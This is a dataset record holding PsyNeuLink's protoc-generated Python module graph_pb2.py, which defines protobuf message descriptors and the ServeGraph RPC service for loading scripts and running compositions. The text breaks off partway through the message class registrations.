| 36.025547 | 141 | 0.532975 | 6,221 | 49,355 | 4.085999 | 0.056904 | 0.026712 | 0.026752 | 0.018175 | 0.745781 | 0.710728 | 0.682796 | 0.652819 | 0.620874 | 0.606908 | 0 | 0.035712 | 0.323716 | 49,355 | 1,369 | 142 | 36.051863 | 0.725837 | 0.12637 | 0 | 0.582073 | 0 | 0 | 0.065615 | 0.003413 | 0 | 0 | 0 | 0 | 0.020518 | 1 | 0.050756 | false | 0 | 0.020518 | 0.016199 | 0.12203 | 0.019438 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7e25a7271dfc02edc1e4d7ee8ec27394dc69dcb1 | 35,165 | py | Python | psyneulink/core/rpc/graph_pb2.py | JeshuaT/PsyNeuLink | 912f691028e848659055430f37b6c15273c762f1 | [
"Apache-2.0"
] | 67 | 2018-01-05T22:18:44.000Z | 2022-03-27T11:27:31.000Z | psyneulink/core/rpc/graph_pb2.py | JeshuaT/PsyNeuLink | 912f691028e848659055430f37b6c15273c762f1 | [
"Apache-2.0"
] | 1,064 | 2017-12-01T18:58:27.000Z | 2022-03-31T22:22:24.000Z | psyneulink/core/rpc/graph_pb2.py | JeshuaT/PsyNeuLink | 912f691028e848659055430f37b6c15273c762f1 | [
"Apache-2.0"
] | 25 | 2017-12-01T20:27:07.000Z | 2022-03-08T21:49:39.000Z | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: graph.proto
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='graph.proto',
package='graph',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x0bgraph.proto\x12\x05graph\"\x0e\n\x0cNullArgument\"\x1e\n\x0cHealthStatus\x12\x0e\n\x06status\x18\x01 \x01(\t\"\x17\n\x07PNLPath\x12\x0c\n\x04path\x18\x01 \x01(\t\"\x1a\n\nScriptPath\x12\x0c\n\x04path\x18\x01 \x01(\t\"*\n\x12ScriptCompositions\x12\x14\n\x0c\x63ompositions\x18\x01 \x03(\t\"&\n\x10ScriptComponents\x12\x12\n\ncomponents\x18\x01 \x03(\t\"\x19\n\tGraphName\x12\x0c\n\x04name\x18\x01 \x01(\t\"#\n\rParameterList\x12\x12\n\nparameters\x18\x01 \x03(\t\"\x1d\n\rComponentName\x12\x0c\n\x04name\x18\x01 \x01(\t\"3\n\tGraphJSON\x12\x13\n\x0bobjectsJSON\x18\x01 \x01(\t\x12\x11\n\tstyleJSON\x18\x02 \x01(\t\"\x1e\n\tStyleJSON\x12\x11\n\tstyleJSON\x18\x01 \x01(\t\"&\n\x07ndArray\x12\r\n\x05shape\x18\x01 \x03(\r\x12\x0c\n\x04\x64\x61ta\x18\x02 \x03(\x01\"6\n\x06Matrix\x12\x0c\n\x04rows\x18\x01 \x01(\r\x12\x0c\n\x04\x63ols\x18\x02 \x01(\r\x12\x10\n\x04\x64\x61ta\x18\x03 \x03(\x01\x42\x02\x10\x01\"s\n\x05\x45ntry\x12\x15\n\rcomponentName\x18\x01 \x01(\t\x12\x15\n\rparameterName\x18\x02 \x01(\t\x12\x0c\n\x04time\x18\x03 \x01(\t\x12\x0f\n\x07\x63ontext\x18\x04 \x01(\t\x12\x1d\n\x05value\x18\x05 \x01(\x0b\x32\x0e.graph.ndArray\"c\n\tServePref\x12\x15\n\rcomponentName\x18\x01 \x01(\t\x12\x15\n\rparameterName\x18\x02 \x01(\t\x12(\n\tcondition\x18\x03 \x01(\x0e\x32\x15.graph.serveCondition\"4\n\nServePrefs\x12&\n\x0cservePrefSet\x18\x01 \x03(\x0b\x32\x10.graph.ServePref\"\xa6\x01\n\rRunTimeParams\x12\x30\n\x06inputs\x18\x01 \x03(\x0b\x32 .graph.RunTimeParams.InputsEntry\x12%\n\nservePrefs\x18\x02 \x01(\x0b\x32\x11.graph.ServePrefs\x1a<\n\x0bInputsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\x1c\n\x05value\x18\x02 \x01(\x0b\x32\r.graph.Matrix:\x02\x38\x01*\x92\x01\n\x0eserveCondition\x12\x12\n\x0eINITIALIZATION\x10\x00\x12\x0e\n\nVALIDATION\x10\x01\x12\r\n\tEXECUTION\x10\x02\x12\x0e\n\nPROCESSING\x10\x03\x12\x0c\n\x08LEARNING\x10\x04\x12\x0b\n\x07\x43ONTROL\x10\x05\x12\x0e\n\nSIMULATION\x10\x06\x12\t\n\x05TRIAL\x10\x07\x12\x07\n\x03RUN\x10\x08\x32\xe8\x04\n\nServeGraph\x12\x36\n\rLoadCustomPnl\x12\x0e.graph.PNLPath\x1a\x13.graph.NullArgument\"\x00\x12<\n\nLoadScript\x12\x11.graph.ScriptPath\x1a\x19.graph.ScriptCompositions\"\x00\x12\x35\n\x0cLoadGraphics\x12\x11.graph.ScriptPath\x1a\x10.graph.StyleJSON\"\x00\x12\x45\n\x15GetLoggableParameters\x12\x14.graph.ComponentName\x1a\x14.graph.ParameterList\"\x00\x12\x43\n\x0fGetCompositions\x12\x13.graph.NullArgument\x1a\x19.graph.ScriptCompositions\"\x00\x12<\n\rGetComponents\x12\x10.graph.GraphName\x1a\x17.graph.ScriptComponents\"\x00\x12/\n\x07GetJSON\x12\x10.graph.GraphName\x1a\x10.graph.GraphJSON\"\x00\x12\x39\n\x0bHealthCheck\x12\x13.graph.NullArgument\x1a\x13.graph.HealthStatus\"\x00\x12=\n\x10UpdateStylesheet\x12\x10.graph.StyleJSON\x1a\x13.graph.NullArgument\"\x00(\x01\x12\x38\n\x0eRunComposition\x12\x14.graph.RunTimeParams\x1a\x0c.graph.Entry\"\x00\x30\x01\x62\x06proto3'
)
_SERVECONDITION = _descriptor.EnumDescriptor(
name='serveCondition',
full_name='graph.serveCondition',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='INITIALIZATION', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='VALIDATION', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='EXECUTION', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PROCESSING', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LEARNING', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CONTROL', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SIMULATION', index=6, number=6,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRIAL', index=7, number=7,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='RUN', index=8, number=8,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=925,
serialized_end=1071,
)
_sym_db.RegisterEnumDescriptor(_SERVECONDITION)
serveCondition = enum_type_wrapper.EnumTypeWrapper(_SERVECONDITION)
INITIALIZATION = 0
VALIDATION = 1
EXECUTION = 2
PROCESSING = 3
LEARNING = 4
CONTROL = 5
SIMULATION = 6
TRIAL = 7
RUN = 8
_NULLARGUMENT = _descriptor.Descriptor(
name='NullArgument',
full_name='graph.NullArgument',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=22,
serialized_end=36,
)
_HEALTHSTATUS = _descriptor.Descriptor(
name='HealthStatus',
full_name='graph.HealthStatus',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='status', full_name='graph.HealthStatus.status', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=38,
serialized_end=68,
)
_PNLPATH = _descriptor.Descriptor(
name='PNLPath',
full_name='graph.PNLPath',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='path', full_name='graph.PNLPath.path', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=70,
serialized_end=93,
)
_SCRIPTPATH = _descriptor.Descriptor(
name='ScriptPath',
full_name='graph.ScriptPath',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='path', full_name='graph.ScriptPath.path', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=95,
serialized_end=121,
)
_SCRIPTCOMPOSITIONS = _descriptor.Descriptor(
name='ScriptCompositions',
full_name='graph.ScriptCompositions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='compositions', full_name='graph.ScriptCompositions.compositions', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=123,
serialized_end=165,
)
_SCRIPTCOMPONENTS = _descriptor.Descriptor(
name='ScriptComponents',
full_name='graph.ScriptComponents',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='components', full_name='graph.ScriptComponents.components', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=167,
serialized_end=205,
)
_GRAPHNAME = _descriptor.Descriptor(
name='GraphName',
full_name='graph.GraphName',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='graph.GraphName.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=207,
serialized_end=232,
)
_PARAMETERLIST = _descriptor.Descriptor(
name='ParameterList',
full_name='graph.ParameterList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='parameters', full_name='graph.ParameterList.parameters', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=234,
serialized_end=269,
)
_COMPONENTNAME = _descriptor.Descriptor(
name='ComponentName',
full_name='graph.ComponentName',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='graph.ComponentName.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=271,
serialized_end=300,
)
_GRAPHJSON = _descriptor.Descriptor(
name='GraphJSON',
full_name='graph.GraphJSON',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='objectsJSON', full_name='graph.GraphJSON.objectsJSON', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='styleJSON', full_name='graph.GraphJSON.styleJSON', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=302,
serialized_end=353,
)
_STYLEJSON = _descriptor.Descriptor(
name='StyleJSON',
full_name='graph.StyleJSON',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='styleJSON', full_name='graph.StyleJSON.styleJSON', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=355,
serialized_end=385,
)
_NDARRAY = _descriptor.Descriptor(
name='ndArray',
full_name='graph.ndArray',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='shape', full_name='graph.ndArray.shape', index=0,
number=1, type=13, cpp_type=3, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='data', full_name='graph.ndArray.data', index=1,
number=2, type=1, cpp_type=5, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=387,
serialized_end=425,
)
_MATRIX = _descriptor.Descriptor(
name='Matrix',
full_name='graph.Matrix',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='rows', full_name='graph.Matrix.rows', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cols', full_name='graph.Matrix.cols', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='data', full_name='graph.Matrix.data', index=2,
number=3, type=1, cpp_type=5, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\020\001', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=427,
serialized_end=481,
)
_ENTRY = _descriptor.Descriptor(
name='Entry',
full_name='graph.Entry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='componentName', full_name='graph.Entry.componentName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='parameterName', full_name='graph.Entry.parameterName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='time', full_name='graph.Entry.time', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='context', full_name='graph.Entry.context', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='graph.Entry.value', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=483,
serialized_end=598,
)
_SERVEPREF = _descriptor.Descriptor(
name='ServePref',
full_name='graph.ServePref',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='componentName', full_name='graph.ServePref.componentName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='parameterName', full_name='graph.ServePref.parameterName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='condition', full_name='graph.ServePref.condition', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=600,
serialized_end=699,
)
_SERVEPREFS = _descriptor.Descriptor(
name='ServePrefs',
full_name='graph.ServePrefs',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='servePrefSet', full_name='graph.ServePrefs.servePrefSet', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=701,
serialized_end=753,
)
_RUNTIMEPARAMS_INPUTSENTRY = _descriptor.Descriptor(
name='InputsEntry',
full_name='graph.RunTimeParams.InputsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='graph.RunTimeParams.InputsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='graph.RunTimeParams.InputsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=862,
serialized_end=922,
)
_RUNTIMEPARAMS = _descriptor.Descriptor(
name='RunTimeParams',
full_name='graph.RunTimeParams',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='inputs', full_name='graph.RunTimeParams.inputs', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='servePrefs', full_name='graph.RunTimeParams.servePrefs', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_RUNTIMEPARAMS_INPUTSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=756,
serialized_end=922,
)
_ENTRY.fields_by_name['value'].message_type = _NDARRAY
_SERVEPREF.fields_by_name['condition'].enum_type = _SERVECONDITION
_SERVEPREFS.fields_by_name['servePrefSet'].message_type = _SERVEPREF
_RUNTIMEPARAMS_INPUTSENTRY.fields_by_name['value'].message_type = _MATRIX
_RUNTIMEPARAMS_INPUTSENTRY.containing_type = _RUNTIMEPARAMS
_RUNTIMEPARAMS.fields_by_name['inputs'].message_type = _RUNTIMEPARAMS_INPUTSENTRY
_RUNTIMEPARAMS.fields_by_name['servePrefs'].message_type = _SERVEPREFS
DESCRIPTOR.message_types_by_name['NullArgument'] = _NULLARGUMENT
DESCRIPTOR.message_types_by_name['HealthStatus'] = _HEALTHSTATUS
DESCRIPTOR.message_types_by_name['PNLPath'] = _PNLPATH
DESCRIPTOR.message_types_by_name['ScriptPath'] = _SCRIPTPATH
DESCRIPTOR.message_types_by_name['ScriptCompositions'] = _SCRIPTCOMPOSITIONS
DESCRIPTOR.message_types_by_name['ScriptComponents'] = _SCRIPTCOMPONENTS
DESCRIPTOR.message_types_by_name['GraphName'] = _GRAPHNAME
DESCRIPTOR.message_types_by_name['ParameterList'] = _PARAMETERLIST
DESCRIPTOR.message_types_by_name['ComponentName'] = _COMPONENTNAME
DESCRIPTOR.message_types_by_name['GraphJSON'] = _GRAPHJSON
DESCRIPTOR.message_types_by_name['StyleJSON'] = _STYLEJSON
DESCRIPTOR.message_types_by_name['ndArray'] = _NDARRAY
DESCRIPTOR.message_types_by_name['Matrix'] = _MATRIX
DESCRIPTOR.message_types_by_name['Entry'] = _ENTRY
DESCRIPTOR.message_types_by_name['ServePref'] = _SERVEPREF
DESCRIPTOR.message_types_by_name['ServePrefs'] = _SERVEPREFS
DESCRIPTOR.message_types_by_name['RunTimeParams'] = _RUNTIMEPARAMS
DESCRIPTOR.enum_types_by_name['serveCondition'] = _SERVECONDITION
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
NullArgument = _reflection.GeneratedProtocolMessageType('NullArgument', (_message.Message,), {
'DESCRIPTOR' : _NULLARGUMENT,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.NullArgument)
})
_sym_db.RegisterMessage(NullArgument)
HealthStatus = _reflection.GeneratedProtocolMessageType('HealthStatus', (_message.Message,), {
'DESCRIPTOR' : _HEALTHSTATUS,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.HealthStatus)
})
_sym_db.RegisterMessage(HealthStatus)
PNLPath = _reflection.GeneratedProtocolMessageType('PNLPath', (_message.Message,), {
'DESCRIPTOR' : _PNLPATH,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.PNLPath)
})
_sym_db.RegisterMessage(PNLPath)
ScriptPath = _reflection.GeneratedProtocolMessageType('ScriptPath', (_message.Message,), {
'DESCRIPTOR' : _SCRIPTPATH,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.ScriptPath)
})
_sym_db.RegisterMessage(ScriptPath)
ScriptCompositions = _reflection.GeneratedProtocolMessageType('ScriptCompositions', (_message.Message,), {
'DESCRIPTOR' : _SCRIPTCOMPOSITIONS,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.ScriptCompositions)
})
_sym_db.RegisterMessage(ScriptCompositions)
ScriptComponents = _reflection.GeneratedProtocolMessageType('ScriptComponents', (_message.Message,), {
'DESCRIPTOR' : _SCRIPTCOMPONENTS,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.ScriptComponents)
})
_sym_db.RegisterMessage(ScriptComponents)
GraphName = _reflection.GeneratedProtocolMessageType('GraphName', (_message.Message,), {
'DESCRIPTOR' : _GRAPHNAME,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.GraphName)
})
_sym_db.RegisterMessage(GraphName)
ParameterList = _reflection.GeneratedProtocolMessageType('ParameterList', (_message.Message,), {
'DESCRIPTOR' : _PARAMETERLIST,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.ParameterList)
})
_sym_db.RegisterMessage(ParameterList)
ComponentName = _reflection.GeneratedProtocolMessageType('ComponentName', (_message.Message,), {
'DESCRIPTOR' : _COMPONENTNAME,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.ComponentName)
})
_sym_db.RegisterMessage(ComponentName)
GraphJSON = _reflection.GeneratedProtocolMessageType('GraphJSON', (_message.Message,), {
'DESCRIPTOR' : _GRAPHJSON,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.GraphJSON)
})
_sym_db.RegisterMessage(GraphJSON)
StyleJSON = _reflection.GeneratedProtocolMessageType('StyleJSON', (_message.Message,), {
'DESCRIPTOR' : _STYLEJSON,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.StyleJSON)
})
_sym_db.RegisterMessage(StyleJSON)
ndArray = _reflection.GeneratedProtocolMessageType('ndArray', (_message.Message,), {
'DESCRIPTOR' : _NDARRAY,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.ndArray)
})
_sym_db.RegisterMessage(ndArray)
Matrix = _reflection.GeneratedProtocolMessageType('Matrix', (_message.Message,), {
'DESCRIPTOR' : _MATRIX,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.Matrix)
})
_sym_db.RegisterMessage(Matrix)
Entry = _reflection.GeneratedProtocolMessageType('Entry', (_message.Message,), {
'DESCRIPTOR' : _ENTRY,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.Entry)
})
_sym_db.RegisterMessage(Entry)
ServePref = _reflection.GeneratedProtocolMessageType('ServePref', (_message.Message,), {
